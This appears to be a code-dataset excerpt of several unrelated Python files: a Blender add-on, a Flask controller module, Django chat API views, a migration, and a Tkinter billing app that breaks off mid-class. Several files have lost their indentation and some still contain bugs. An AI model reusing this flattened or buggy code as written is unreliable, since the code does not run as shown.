"description": "Tools for cutting and trimming mesh objects",
"author": "Patrick Moore",
"version": (0, 0, 1),
"blender": (2, 81, 0),
"location": "View 3D > Tool Shelf",
"warning": "", # used for warning icon and text in addons panel
"wiki_url": "", # TODO update for b280 branch
"tracker_url": "", # TODO update for 280 branch
"category": "3D View",
}
# Blender imports
import bpy
from bpy.types import Operator, AddonPreferences
from bpy.props import (
StringProperty,
IntProperty,
BoolProperty,
EnumProperty,
FloatProperty,
FloatVectorProperty,
)
# TODO Preferences
# TODO Menu
# Tools
from .op_polytrim.polytrim import CutMesh_Polytrim
# addon preferences
class CutMeshPreferences(AddonPreferences):
bl_idname = __name__
# Segmentation Editor Behavior
spline_preview_tess: IntProperty(
name="Spline Teseslation", default=20, min=3, max=100
)
sketch_fit_epsilon: FloatProperty(
name="Sketch Epsilon", default=0.25, min=0.001, max=10
)
patch_boundary_fit_epsilon: FloatProperty(
name="Boundary Epsilon", default=0.35, min=0.001, max=10
)
spline_tessellation_epsilon: FloatProperty(
name="Spline Epsilon", default=0.1, min=0.001, max=10
)
destructive: EnumProperty(
name="Geometry Mode",
items=[
("DESTRUCTIVE", "DESTRUCTIVE", "DESTRUCTIVE"),
("NON_DESTRUCTIVE", "NON_DESTRUCTIVE", "NON_DESTRUCTIVE"),
],
default="DESTRUCTIVE",
)
# 2D Interaction Behavior
non_man_snap_pxl_rad: IntProperty(
name="Snap Radius Pixel", default=20, min=5, max=150
)
sel_pxl_rad: IntProperty(name="Select Radius Pixel", default=10, min=3, max=100)
loop_close_pxl_rad = IntProperty(
name="Select Radius Pixel", default=10, min=3, max=100
)
# Menu Colors
menu_bg_color: FloatVectorProperty(
name="Mennu Backgrounng Color",
description="FLoating Menu color",
min=0,
max=1,
default=(0.3, 0.3, 0.3),
subtype="COLOR",
)
menu_border_color: FloatVectorProperty(
name="Menu Border Color",
description="FLoating menu border colro",
min=0,
max=1,
default=(0.1, 0.1, 0.1),
subtype="COLOR",
)
deact_button_color: FloatVectorProperty(
name="Button Color",
description="Deactivated button color",
min=0,
max=1,
default=(0.5, 0.5, 0.5),
subtype="COLOR",
)
act_button_color: FloatVectorProperty(
name="Active Button Color",
description="Activated button color",
min=0,
max=1,
default=(0.2, 0.2, 1),
subtype="COLOR",
)
# Geometry Colors
act_point_color: FloatVectorProperty(
name="Active Point Color",
description="Selected/Active point color",
min=0,
max=1,
default=(0.2, 0.7, 0.2),
subtype="COLOR",
)
act_patch_color: FloatVectorProperty(
name="Active Patch Color",
description="Selected/Active patch color",
min=0,
max=1,
default=(0.2, 0.7, 0.2),
subtype="COLOR",
)
spline_default_color: FloatVectorProperty(
name="Spline Color",
description="Spline color",
min=0,
max=1,
default=(0.2, 0.2, 0.7),
subtype="COLOR",
)
hint_color: FloatVectorProperty(
name="Hint Color",
description="Hint Geometry color",
min=0,
max=1,
default=(0.5, 1, 0.5),
subtype="COLOR",
)
bad_segment_color: FloatVectorProperty(
name="Active Button Color",
description="Activated button color",
min=0,
max=1,
default=(1, 0.6, 0.2),
subtype="COLOR",
)
bad_segment_hint_color: FloatVectorProperty(
name="Bad Segment Hint",
description="Bad segment hint color",
min=0,
max=1,
default=(1, 0, 0),
subtype="COLOR",
)
def draw(self, context):
layout = self.layout
layout.label(text="Cut Mesh Preferences")
# layout.prop(self, "mat_lib")
## Visualization
row = layout.row(align=True)
row.label(text="Visualization Settings")
row = layout.row(align=True)
row.prop(self, "menu_bg_color")
row.prop(self, "menu_border_color")
row.prop(self, "deact_button_color")
row.prop(self, "act_button_color")
## Operator Defaults
# box = layout.box().column(align=False)
row = layout.row()
row.label(text="Operator Defaults")
# ...This properties do not exist yet so i comment code lines..............................................
# ##### Fit and Thickness ####
# row = layout.row()
# row.label(text="Thickness, Fit and Retention")
# row = layout.row()
# row.prop(self, "def_shell_thickness")
# row.prop(self, "def_passive_radius")
# row.prop(self, "def_blockout_radius")
def register():
bpy.utils.register_class(CutMeshPreferences) # TODO
# bpy.utils.register_class(CutMesh_panel) #TODO
# bpy.utils.register_class(CutMesh_menu) #TODO
bpy.utils.register_class(CutMesh_Polytrim)
def unregister():
bpy.utils.unregister_class(CutMeshPreferences) # TODO
# bpy.utils.register_class(CutMesh_panel) #TODO
# bpy.utils.register_class(CutMesh_menu) #TODO
bpy.utils.unregister_class(CutMesh_Polytrim)
# class polytrimPanel(bpy.types.Panel):
# bl_label = "Cut Mesh Tools"
# bl_idname = "cut_mesh_panel"
# bl_space_type = "VIEW_3D"
# bl_region_type = "UI"
# bl_category = "CutMesh"
# bl_context = ""
# def draw(self, context):
# layout = self.layout
# layout.label(text="Mesh Cut")
# row = layout.row()
# row.operator("cut_mesh.polytrim")
############################################################################################
# Registration :
############################################################################################
addon_modules = []
classes = [CutMesh_Polytrim, CutMeshPreferences]
# Registration :
def register():
for module in addon_modules:
module.register()
for cl in classes:
bpy.utils.register_class(cl)
def unregister():
for cl in classes:
bpy.utils.unregister_class(cl)
for module in reversed(addon_modules):
module.unregister()
if __name__ == "__main__":
register()
|
24,684 | cee984f15dac205423ed1f567a9d950169af6690 | from flask import Flask
import os
import Controller
import ControllerType
import Actuator
import AutomationConfig
class MissingController(Exception):
"""No controller specified"""
pass
class MissingId(Exception):
"""No controller specified"""
pass
def Config():
return AutomationConfig.Config()
def AddActuator(controller, config_dict):
return controller.CreateActuator(config_dict)
def AddController(controller_type, config_dict):
return controller_type.CreateController(config_dict)
def DeleteActuator(actuator_name):
actuator = Actuator.Find(actuator_name)
if actuator:
Actuator.Delete(actuator)
def DeleteController(controller_name):
Controller.Delete(controller_name)
def EditActuator(actuator, new_config_dict):
actuator.Edit(new_config_dict)
def EditController(controller, new_config_dict):
controller.Edit(new_config_dict)
def FindController(name):
return Controller.Find(name)
def FindActuator(name):
return Actuator.Find(name)
def NextOrder():
return Actuator.NextOrder()
def ToggleActuator(name):
actuator = Actuator.Find(name)
if actuator:
actuator.SetState(not actuator.State())
def OrderedActuators(category=None):
return Actuator.OrderedActuators(category)
def OrderedAliases(category=None):
return Actuator.OrderedAliases(category)
def OrderedControllers(category=None):
return Controller.OrderedControllers(category)
def FindControllerType(name):
return ControllerType.Find(name)
def GetControllerTypes():
return ControllerType.GetTypes()
def GetControllerNames():
return Controller.GetNames()
def ActuatorCategories():
return Actuator.ActuatorCategories()
def ControllerCategories():
return Controller.ControllerCategories()
if __name__ == '__main__':
    # BUG FIX: the original used Python 2 `print` statements, which are a
    # SyntaxError on Python 3 and made the whole module unimportable there;
    # converted to print() calls.  NOTE(review): assumes the project targets
    # Python 3 -- confirm (the rest of this file is Python-3 compatible).
    AutomationConfig.Read()
    print("===== Controller Types =====")
    ControllerType.Dump()
    print("===== Controllers =====")
    Controller.DumpControllers()
    print("===== Actuators =====")
    Actuator.DumpActuators()
    if False:
        print("=== Config ===")
        config = AutomationConfig.Config()
        for section in config.sections():
            print('[', section, ']')
            for item in config.items(section):
                print(' ', item[0], '=', item[1])
|
24,685 | f2aac9f92efb7275cc0847a00a4bd0921f187929 | def Test():
s=int(input())
two=bin(s)[2:]
new=int(("0"+two.replace("0","1")),2)
print(str(new-s)+" "+str(new))
if __name__ == "__main__":
total=int(input())
for i in range(0,total):
Test() |
24,686 | 759eaf1bdf72a442926d996adff430fd1511a9ff | #
# Lasciate ogni speranza, voi ch'entrate
#
from rest_framework import viewsets, status
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import authentication
from rest_framework.pagination import CursorPagination
from rest_framework.authentication import SessionAuthentication
from django.contrib.auth.models import User
from cent import Client
import json, os, jwt
from ..settings import BASE_DIR
from .serializers import MessageSerializer, ChatSerializer, UserSerializer
from .models import Message, Chat
cf_file = open(os.path.join(BASE_DIR, 'config/centrifugo.json'))
cf = json.load(cf_file)
centrifuge = Client("http://centrifugo:8000", api_key=cf['api_key'])
cf_file.close()
def check_user_access(request, chatId):
    """Return True when the requesting user may access chat *chatId*.

    Staff members are always allowed; everyone else must be a member of the
    chat's `users` relation.  Raises Chat.DoesNotExist for an unknown id
    (only reached for non-staff users).
    """
    if request.user.is_staff:
        return True
    chat = Chat.objects.get(id=chatId)
    return chat.users.filter(id=request.user.id).exists()
class CsrfExemptSessionAuthentication(SessionAuthentication):
def enforce_csrf(self, request):
return
class CursorSetPagination(CursorPagination):
page_size = 200
page_size_query_param = 'count'
ordering = '-date' # '-creation' is default
#
# Admin methods
#
class CreateChatView(APIView):
authentication_classes = [authentication.SessionAuthentication]
def post(self, request, format=None):
if not request.user.is_staff:
return Response(0, status=status.HTTP_403_FORBIDDEN)
serialier = ChatSerializer(data=request.data)
if serialier.is_valid():
chat = serialier.save(users=[request.user])
return Response(ChatSerializer(chat).data, status=status.HTTP_200_OK)
return Response(serialier.errors, status=status.HTTP_400_BAD_REQUEST)
class GetUsersView(APIView):
authentication_classes = [authentication.SessionAuthentication]
def get(self, request, format=None):
if not request.user.is_staff:
return Response(0, status=status.HTTP_403_FORBIDDEN)
return Response(UserSerializer(User.objects, many=True).data, status=status.HTTP_200_OK)
class AddChatMemberView(APIView):
    """POST {chat, id}: add user *id* to a chat (staff only) and broadcast a
    'userJoined' system message on the chat's centrifugo channel."""
    # Consistency fix: every other view in this module pins session
    # authentication explicitly; this one previously fell back to the
    # project-wide defaults.
    authentication_classes = [authentication.SessionAuthentication]

    def post(self, request, format=None):
        if not request.user.is_staff:
            return Response(0, status=status.HTTP_403_FORBIDDEN)
        # Keep the try block narrow: only the lookups can raise DoesNotExist.
        try:
            chat = Chat.objects.get(id=request.data['chat'])
            user = User.objects.get(id=request.data['id'])
        except (Chat.DoesNotExist, User.DoesNotExist):
            return Response("chat or user does not exist",
                            status=status.HTTP_400_BAD_REQUEST)
        chat.users.add(user)
        msg = Message(type='userJoined', author=user, chat=chat)
        msg.save()
        # The acting admin has implicitly read the system message.
        msg.read.set([request.user])
        data = MessageSerializer(msg).data
        centrifuge.publish("$chat-{}".format(request.data['chat']),
                           {'data': data, 'type': 'newMessage'})
        return Response(True, status=status.HTTP_200_OK)
class RmChatMemberView(APIView):
    """POST {chat, id}: remove user *id* from a chat (staff only) and
    broadcast a 'userLeft' system message on the chat's centrifugo channel."""
    # Consistency fix: pin session authentication like the sibling views.
    authentication_classes = [authentication.SessionAuthentication]

    def post(self, request, format=None):
        if not request.user.is_staff:
            return Response(0, status=status.HTTP_403_FORBIDDEN)
        # Keep the try block narrow: only the lookups can raise DoesNotExist.
        try:
            chat = Chat.objects.get(id=request.data['chat'])
            user = User.objects.get(id=request.data['id'])
        except (Chat.DoesNotExist, User.DoesNotExist):
            return Response("chat or user does not exist",
                            status=status.HTTP_400_BAD_REQUEST)
        chat.users.remove(user)
        msg = Message(type='userLeft', author=user, chat=chat)
        msg.save()
        msg.read.set([request.user])
        data = MessageSerializer(msg).data
        centrifuge.publish("$chat-{}".format(request.data['chat']),
                           {'data': data, 'type': 'newMessage'})
        return Response(True, status=status.HTTP_200_OK)
#
# API
#
class GetSelfView(APIView):
    """GET: serialize the authenticated user, adding an 'admin' flag."""
    authentication_classes = [authentication.SessionAuthentication]

    def get(self, request, format=None):
        payload = dict(UserSerializer(request.user).data)
        payload['admin'] = request.user.is_staff
        return Response(payload, status=status.HTTP_200_OK)
class SendTextView(APIView):
    """POST: send a text message to a chat the user is a member of."""
    authentication_classes = [authentication.SessionAuthentication]

    def post(self, request, format=None):
        # BUG FIX: the original returned the undefined name `token` here,
        # which raised NameError instead of issuing a 403 to non-members.
        if not check_user_access(request, request.data['chat']):
            return Response("not a member", status=status.HTTP_403_FORBIDDEN)
        serializer = MessageSerializer(data=request.data)
        if serializer.is_valid() and 'text' in serializer.validated_data:
            msg = serializer.save(author=request.user, type='text')
            data = MessageSerializer(msg).data
            centrifuge.publish("$chat-{}".format(request.data['chat']),
                               {'data': data, 'type': 'newMessage'})
            return Response(data, status=status.HTTP_201_CREATED)
        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class SendImgView(APIView):
    """POST: send an image message to a chat the user is a member of."""
    authentication_classes = [authentication.SessionAuthentication]

    def post(self, request, format=None):
        # BUG FIX: the original returned the undefined name `token` here
        # (NameError) instead of issuing a 403 to non-members.
        if not check_user_access(request, request.data['chat']):
            return Response("not a member", status=status.HTTP_403_FORBIDDEN)
        serializer = MessageSerializer(data=request.data)
        if serializer.is_valid() and 'img' in serializer.validated_data:
            msg = serializer.save(author=request.user, type='img')
            # BUG FIX: the original did MessageSerializer(data=msg.data).data,
            # but msg is a Message model instance (no .data attribute) — this
            # raised AttributeError. Serialize the instance like SendTextView.
            data = MessageSerializer(msg).data
            centrifuge.publish("$chat-{}".format(request.data['chat']),
                               {'data': data, 'type': 'newMessage'})
            return Response(data, status=status.HTTP_201_CREATED)
        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class SendStickerView(APIView):
    """POST: send a sticker (image without text) to a chat the user belongs to."""
    authentication_classes = [authentication.SessionAuthentication]

    def post(self, request, format=None):
        # BUG FIX: the original returned the undefined name `token` here
        # (NameError) instead of issuing a 403 to non-members.
        if not check_user_access(request, request.data['chat']):
            return Response("not a member", status=status.HTTP_403_FORBIDDEN)
        serializer = MessageSerializer(data=request.data)
        if serializer.is_valid() and 'img' in serializer.validated_data \
                and 'text' not in serializer.validated_data:
            msg = serializer.save(author=request.user, type='sticker')
            # BUG FIX: serialize the saved instance, not
            # MessageSerializer(data=msg.data) — Message has no .data attribute.
            data = MessageSerializer(msg).data
            centrifuge.publish("$chat-{}".format(request.data['chat']),
                               {'data': data, 'type': 'newMessage'})
            return Response(data, status=status.HTTP_201_CREATED)
        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class GetChatsView(APIView):
    """GET: list chats — the user's own chats, or every chat for staff."""
    authentication_classes = [authentication.SessionAuthentication]

    def get(self, request, format=None):
        if request.user.is_staff:
            chats = Chat.objects
        else:
            chats = request.user.chat_set.all()
        serialized = ChatSerializer(chats, many=True, read_only=True)
        return Response(serialized.data, status=status.HTTP_200_OK)
class GetChatHistoryView(APIView):
    """POST {id}: return one cursor-paginated page of a chat's messages."""
    authentication_classes = [authentication.SessionAuthentication]

    def post(self, request, format=None):
        # check_user_access already grants staff unconditionally, so the
        # original's separate `not request.user.is_staff and` test was redundant.
        if not check_user_access(request, request.data['id']):
            return Response("not a member", status=status.HTTP_403_FORBIDDEN)
        chat = Chat.objects.get(id=request.data['id'])
        messages = chat.message_set.all()
        paginator = CursorSetPagination()
        page = paginator.paginate_queryset(messages, request)
        serializer = MessageSerializer(page, many=True, read_only=True)
        return Response(serializer.data, status=status.HTTP_200_OK)
class GetSubscriptionView(APIView):
    """POST (centrifugo subscribe proxy): issue per-channel JWT subscription
    tokens for the requested "$chat-{id}" channels."""
    authentication_classes = [CsrfExemptSessionAuthentication]

    def post(self, request, format=None):
        clientId = request.data['client']
        channels = request.data['channels']  # each formatted as "$chat-{id}"
        results = []
        for channel in channels:
            chatId = int(channel.split('-')[-1])
            # BUG FIX: on denial the original returned `token`, which is not
            # yet bound on the first iteration — a NameError, not a 403.
            if not check_user_access(request, chatId):
                return Response("not a member", status=status.HTTP_403_FORBIDDEN)
            token = jwt.encode({
                "client": clientId,
                "channel": "$chat-{}".format(chatId)
            }, cf['secret'], algorithm="HS256").decode()
            results.append({
                "channel": channel,
                "token": token
            })
        return Response({"channels": results}, status=status.HTTP_200_OK)
class MarkAsReadView(APIView):
    """POST {chat, id}: mark every message in the chat with id <= *id* as read
    by the requesting user, and broadcast a 'readMessage' event."""
    authentication_classes = [authentication.SessionAuthentication]

    def post(self, request, format=None):
        # BUG FIX: the original returned the undefined name `token` here
        # (NameError) instead of issuing a 403 to non-members.
        if not check_user_access(request, request.data['chat']):
            return Response("not a member", status=status.HTTP_403_FORBIDDEN)
        # (removed leftover debug print of request.data)
        messages = Chat.objects.get(id=request.data['chat']) \
            .message_set.filter(id__lte=request.data['id'])
        request.user.chat_message_readby.add(*messages)
        centrifuge.publish("$chat-{}".format(request.data['chat']), {
            'data': {
                'ids': [message.id for message in messages],
                'by': UserSerializer(request.user).data,
            },
            'type': 'readMessage'
        })
        return Response(len(messages), status=status.HTTP_200_OK)
class GetCentrifugoTokenView(APIView):
    """GET: issue the centrifugo connection JWT for the authenticated user."""
    authentication_classes = [authentication.SessionAuthentication]
    def get(self, request, format=None):
        # NOTE(review): .decode() assumes PyJWT 1.x, where encode() returns
        # bytes; PyJWT >= 2.0 returns str and this line would raise
        # AttributeError — confirm the pinned PyJWT version.
        token = jwt.encode({"sub": str(request.user.id)}, cf['secret']).decode()
        return Response(token, status=status.HTTP_200_OK)
|
24,687 | 68fe332076c2aa01ae7596cd88bc23fabf5de2cf | # Generated by Django 2.0.3 on 2018-04-10 07:51
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: alter user.sex to TextField(default='', max_length=4).

    NOTE(review): max_length on a TextField is not enforced at the database
    level by Django (forms-only validation) — confirm this was intentional.
    """
    dependencies = [
        ('myApp', '0011_auto_20180410_0741'),
    ]
    operations = [
        migrations.AlterField(
            model_name='user',
            name='sex',
            field=models.TextField(default='', max_length=4),
        ),
    ]
|
24,688 | fc0e1ff0bfbdc8ff7033489c55fb3687e91c20e9 | from tkinter import *
import math, random, os
from tkinter import messagebox
class Bill_App:
def __init__(self, root):
self.root = root
self.root.geometry("1350x700+0+0")
self.root.title("Billing Software")
bd_color = "#074463"
title = Label(self.root, text="Billing Software", bd=10, relief=GROOVE, bg=bd_color, fg="white",
font=("times new roman", 30, "bold"), pady=2).pack(fill=X)
# ========veriable===============================
# ========Cosmetics==============================
self.soap = IntVar()
self.face_cream = IntVar()
self.face_wash = IntVar()
self.spray = IntVar()
self.gell = IntVar()
self.loshan = IntVar()
# =========Grocery================================
self.rice = IntVar()
self.food_oil = IntVar()
self.daal = IntVar()
self.wheat = IntVar()
self.sugar = IntVar()
self.tea = IntVar()
# =========Cold Drinks=============================
self.maza = IntVar()
self.cock = IntVar()
self.frooti = IntVar()
self.thumbsup = IntVar()
self.limca = IntVar()
self.sprite = IntVar()
# ============Total Product Price & Tax Variable
self.cosmetic_price = StringVar()
self.grocery_price = StringVar()
self.cold_drink_price = StringVar()
self.cosmetic_tax = StringVar()
self.grocery_tax = StringVar()
self.cold_drink_tax = StringVar()
# =========Customes==================================
self.c_name = StringVar()
self.c_phon = StringVar()
self.bill_no = StringVar()
x = random.randint(1000, 9999)
self.bill_no.set(str(x))
self.search_bill = StringVar()
# ===============Customer Detail frame================
F1 = LabelFrame(self.root, bd=10, relief=GROOVE, text="Customer Details", font=("times new roman", 15, "bold"),
fg="gold", bg=bd_color)
F1.place(x=0, y=80, relwidth=1)
cname_lbl = Label(F1, text="Customer Name ", bg=bd_color, fg="white",
font=("times new roman", 18, "bold")).grid(row=0, column=0, padx=20, pady=5)
cname_text = Entry(F1, width=13, font="arial 15", textvariable=self.c_name, bd=7, relief=SUNKEN).grid(row=0,
column=1,
pady=5,
padx=10)
cphn_lbl = Label(F1, text="Customer Phone No. ", bg=bd_color, fg="white",
font=("times new roman", 18, "bold")).grid(row=0, column=2, padx=20, pady=5)
cname_text = Entry(F1, width=13, font="arial 15", textvariable=self.c_phon, bd=7, relief=SUNKEN).grid(row=0,
column=3,
pady=5,
padx=10)
cbill_lbl = Label(F1, text="Bill Number ", bg=bd_color, fg="white", font=("times new roman", 18, "bold")).grid(
row=0, column=4, padx=20, pady=5)
cbill_text = Entry(F1, width=13, font="arial 15", textvariable=self.search_bill, bd=7, relief=SUNKEN).grid(
row=0, column=5, pady=5, padx=10)
bill_btn = Button(F1, text="Search",command=self.find_bill(), width=10, bd=7, font="arial 12 bold").grid(row=0, column=6, pady=10,
padx=10)
# ================Cosmetics Frame============
F2 = LabelFrame(self.root, bd=10, relief=GROOVE, text="Baby Care ", font=("times new roman", 15, "bold"),
fg="gold", bg=bd_color)
F2.place(x=5, y=180, width=320, height=380)
bath_lbl = Label(F2, text="Bath Soap", font=("times new roman", 16, "bold"), bg=bd_color, fg="lightgreen").grid(
row=0, column=0, padx=10, pady=10, sticky="w")
bath_txt = Entry(F2, width=10, font=("times new roman", 16, "bold"), textvariable=self.soap, bd=6,
relief=SUNKEN).grid(row=0, column=1, padx=10, pady=10)
Face_cream_lbl = Label(F2, text="Face Creem", font=("times new roman", 16, "bold"), bg=bd_color,
fg="lightgreen").grid(row=1, column=0, padx=10, pady=10, sticky="w")
Face_cream_txt = Entry(F2, width=10, font=("times new roman", 16, "bold"), textvariable=self.face_cream, bd=6,
relief=SUNKEN).grid(row=1,
column=1, padx=10, pady=10)
Face_w_lbl = Label(F2, text="Face wash", font=("times new roman", 16, "bold"), bg=bd_color,
fg="lightgreen").grid(row=2, column=0,
padx=10, pady=10, sticky="w")
Face_w_txt = Entry(F2, width=10, font=("times new roman", 16, "bold"), textvariable=self.face_wash, bd=6,
relief=SUNKEN).grid(row=2,
column=1, padx=10, pady=10)
Hair_s_lbl = Label(F2, text="Hair Spray", font=("times new roman", 16, "bold"), bg=bd_color,
fg="lightgreen").grid(
row=3, column=0, padx=10, pady=10, sticky="w")
Hair_s_txt = Entry(F2, width=10, font=("times new roman", 16, "bold"), textvariable=self.spray, bd=6,
relief=SUNKEN).grid(row=3, column=1,
padx=10, pady=10)
Hair_g_lbl = Label(F2, text="Hair Gell", font=("times new roman", 16, "bold"), bg=bd_color,
fg="lightgreen").grid(
row=4, column=0, padx=10, pady=10, sticky="w")
Hair_g_txt = Entry(F2, width=10, font=("times new roman", 16, "bold"), bd=6, textvariable=self.gell,
relief=SUNKEN).grid(row=4, column=1,
padx=10, pady=10)
Body_lbl = Label(F2, text="Body Loshan", font=("times new roman", 16, "bold"), bg=bd_color,
fg="lightgreen").grid(
row=5, column=0, padx=10, pady=10, sticky="w")
Body_txt = Entry(F2, width=10, font=("times new roman", 16, "bold"), textvariable=self.loshan, bd=6,
relief=SUNKEN).grid(row=5, column=1,
padx=10, pady=10)
# ================Grocery Frame============
F3 = LabelFrame(self.root, bd=10, relief=GROOVE, text="Beer ", font=("times new roman", 15, "bold"),
fg="gold", bg=bd_color)
F3.place(x=340, y=180, width=320, height=380)
g1_lbl = Label(F3, text="Rice", font=("times new roman", 16, "bold"), bg=bd_color, fg="lightgreen").grid(
row=0, column=0, padx=10, pady=10, sticky="w")
g1_txt = Entry(F3, width=10, font=("times new roman", 16, "bold"), textvariable=self.rice, bd=6,
relief=SUNKEN).grid(row=0, column=1,
padx=10, pady=10)
g2_lbl = Label(F3, text="Food Oil", font=("times new roman", 16, "bold"), bg=bd_color,
fg="lightgreen").grid(row=1, column=0, padx=10, pady=10, sticky="w")
g2_txt = Entry(F3, width=10, font=("times new roman", 16, "bold"), textvariable=self.food_oil, bd=6,
relief=SUNKEN).grid(row=1,
column=1, padx=10, pady=10)
g3_lbl = Label(F3, text="Daal", font=("times new roman", 16, "bold"), bg=bd_color,
fg="lightgreen").grid(row=2, column=0, padx=10, pady=10, sticky="w")
g3_txt = Entry(F3, width=10, font=("times new roman", 16, "bold"), textvariable=self.daal, bd=6,
relief=SUNKEN).grid(row=2,
column=1, padx=10, pady=10)
g4_lbl = Label(F3, text="Wheat", font=("times new roman", 16, "bold"), bg=bd_color,
fg="lightgreen").grid(
row=3, column=0, padx=10, pady=10, sticky="w")
g4_txt = Entry(F3, width=10, font=("times new roman", 16, "bold"), textvariable=self.wheat, bd=6,
relief=SUNKEN).grid(row=3,
column=1, padx=10, pady=10)
g5_lbl = Label(F3, text="Sugar", font=("times new roman", 16, "bold"), bg=bd_color,
fg="lightgreen").grid(
row=4, column=0, padx=10, pady=10, sticky="w")
g5_txt = Entry(F3, width=10, font=("times new roman", 16, "bold"), textvariable=self.sugar, bd=6,
relief=SUNKEN).grid(row=4,
column=1, padx=10, pady=10)
g6_lbl = Label(F3, text="Tea", font=("times new roman", 16, "bold"), bg=bd_color,
fg="lightgreen").grid(
row=5, column=0, padx=10, pady=10, sticky="w")
g6_txt = Entry(F3, width=10, font=("times new roman", 16, "bold"), bd=6, textvariable=self.tea,
relief=SUNKEN).grid(row=5, column=1,
padx=10, pady=10)
# ================Cold Drink Frame============
F4 = LabelFrame(self.root, bd=10, relief=GROOVE, text="Cold Drinks", font=("times new roman", 15, "bold"),
fg="gold", bg=bd_color)
F4.place(x=670, y=180, width=320, height=380)
c1_lbl = Label(F4, text="Coca-Cola", font=("times new roman", 16, "bold"), bg=bd_color, fg="lightgreen").grid(
row=0, column=0, padx=10, pady=10, sticky="w")
c1_txt = Entry(F4, width=10, font=("times new roman", 16, "bold"), textvariable=self.maza, bd=6,
relief=SUNKEN).grid(row=0, column=1,
padx=10, pady=10)
c2_lbl = Label(F4, text="Red Bull", font=("times new roman", 16, "bold"), bg=bd_color,
fg="lightgreen").grid(row=1, column=0, padx=10, pady=10, sticky="w")
c2_txt = Entry(F4, width=10, font=("times new roman", 16, "bold"), textvariable=self.cock, bd=6,
relief=SUNKEN).grid(row=1,
column=1, padx=10, pady=10)
c3_lbl = Label(F4, text="Pepsi", font=("times new roman", 16, "bold"), bg=bd_color,
fg="lightgreen").grid(row=2, column=0, padx=10, pady=10, sticky="w")
c3txt = Entry(F4, width=10, font=("times new roman", 16, "bold"), textvariable=self.frooti, bd=6,
relief=SUNKEN).grid(row=2,
column=1, padx=10, pady=10)
c4_lbl = Label(F4, text="Nescafé ", font=("times new roman", 16, "bold"), bg=bd_color,
fg="lightgreen").grid(
row=3, column=0, padx=10, pady=10, sticky="w")
c4_txt = Entry(F4, width=10, font=("times new roman", 16, "bold"), textvariable=self.thumbsup, bd=6,
relief=SUNKEN).grid(row=3, column=1, padx=10, pady=10)
c5_lbl = Label(F4, text="Sprit", font=("times new roman", 16, "bold"), bg=bd_color,
fg="lightgreen").grid(row=4, column=0, padx=10, pady=10, sticky="w")
c5_txt = Entry(F4, width=10, font=("times new roman", 16, "bold"), textvariable=self.limca, bd=6,
relief=SUNKEN).grid(row=4, column=1, padx=10, pady=10)
c6_lbl = Label(F4, text="Fanta ", font=("times new roman", 16, "bold"), bg=bd_color,
fg="lightgreen").grid(row=5, column=0, padx=10, pady=10, sticky="w")
c6_txt = Entry(F4, width=10, font=("times new roman", 16, "bold"), bd=6, textvariable=self.sprite,
relief=SUNKEN).grid(row=5, column=1,
padx=10, pady=10)
# ===============Bill Area========================
F5 = Frame(self.root, bd=10, relief=GROOVE)
F5.place(x=1000, y=180, width=345, height=380)
bill_title = Label(F5, text="Bill Area", font="arial 15 bold", bd=7, relief=GROOVE).pack(fill=X)
scrol_y = Scrollbar(F5, orient=VERTICAL)
self.txtarea = Text(F5, yscrollcommand=scrol_y.set)
scrol_y.pack(side=RIGHT, fill=Y)
scrol_y.config(command=self.txtarea.yview)
self.txtarea.pack(fill=BOTH, expand=1)
# ===============Button Frame=============
F6 = LabelFrame(self.root, bd=10, relief=GROOVE, text="Bill Menu", font=("times new roman", 15, "bold"),
fg="gold", bg=bd_color)
F6.place(x=0, y=560, relwidth=1, height=140)
m1_lbl = Label(F6, text="Total Cosmetic Price", bg=bd_color, fg="white",
font=("times new roman", 15, "bold")).grid(row=0, column=0, padx=20, pady=1, sticky="w")
m1_txt = Entry(F6, width=18, textvariable=self.cosmetic_price, font="arial 10 bold", bd=7, relief=SUNKEN).grid(
row=0, column=1, padx=10, pady=1)
m2_lbl = Label(F6, text="Total Grocety Price", bg=bd_color, fg="white",
font=("times new roman", 15, "bold")).grid(row=1, column=0, padx=20, pady=1, sticky="w")
m2_txt = Entry(F6, width=18, textvariable=self.grocery_price, font="arial 10 bold", bd=7, relief=SUNKEN).grid(
row=1, column=1, padx=10, pady=1)
m3_lbl = Label(F6, text="Total cold Drinks Price", bg=bd_color, fg="white",
font=("times new roman", 15, "bold")).grid(row=2, column=0, padx=20, pady=1, sticky="w")
m3_txt = Entry(F6, width=18, textvariable=self.cold_drink_price, font="arial 10 bold", bd=7,
relief=SUNKEN).grid(row=2, column=1, padx=10, pady=1)
c1_lbl = Label(F6, text="Cosmetics Tax", bg=bd_color, fg="white",
font=("times new roman", 15, "bold")).grid(row=0, column=2, padx=20, pady=1, sticky="w")
c1_txt = Entry(F6, width=18, textvariable=self.cosmetic_tax, font="arial 10 bold", bd=7, relief=SUNKEN).grid(
row=0, column=3, padx=10, pady=1)
c2_lbl = Label(F6, text="Grocery Tax", bg=bd_color, fg="white",
font=("times new roman", 15, "bold")).grid(row=1, column=2, padx=20, pady=1, sticky="w")
c2_txt = Entry(F6, width=18, textvariable=self.grocery_tax, font="arial 10 bold", bd=7, relief=SUNKEN).grid(
row=1, column=3, padx=10, pady=1)
c3_lbl = Label(F6, text="Cold Drinks Tax", bg=bd_color, fg="white",
font=("times new roman", 15, "bold")).grid(row=2, column=2, padx=20, pady=1, sticky="w")
c3_txt = Entry(F6, width=18, textvariable=self.cold_drink_tax, font="arial 10 bold", bd=7, relief=SUNKEN).grid(
row=2, column=3, padx=10, pady=1)
btn_F = Frame(F6, bd=7, relief=GROOVE)
btn_F.place(x=750, width=580, height=105)
total_btn = Button(btn_F, command=self.total, text="Total", bg="cadetblue", fg="white", pady=15, bd=2, width=10,
font="arial 15 bold").grid(row=0, column=0, padx=5, pady=5)
GBill_btn = Button(btn_F, command=self.bill_area, text="Generate Bill", bg="cadetblue", fg="white", pady=15,
bd=2, width=10, font="arial 15 bold").grid(row=0, column=1, padx=5, pady=5)
Clear_btn = Button(btn_F, text="Clear", command=self.clear_data,bg="cadetblue", fg="white", pady=15, bd=2, width=10,
font="arial 15 bold").grid(row=0, column=3, padx=5, pady=5)
Exit_btn = Button(btn_F, text="Exit",command=self.Exit_app, bg="cadetblue", fg="white", pady=15, bd=2, width=10,
font="arial 15 bold").grid(row=0, column=4, padx=5, pady=5)
self.welcome_bill()
    def total(self):
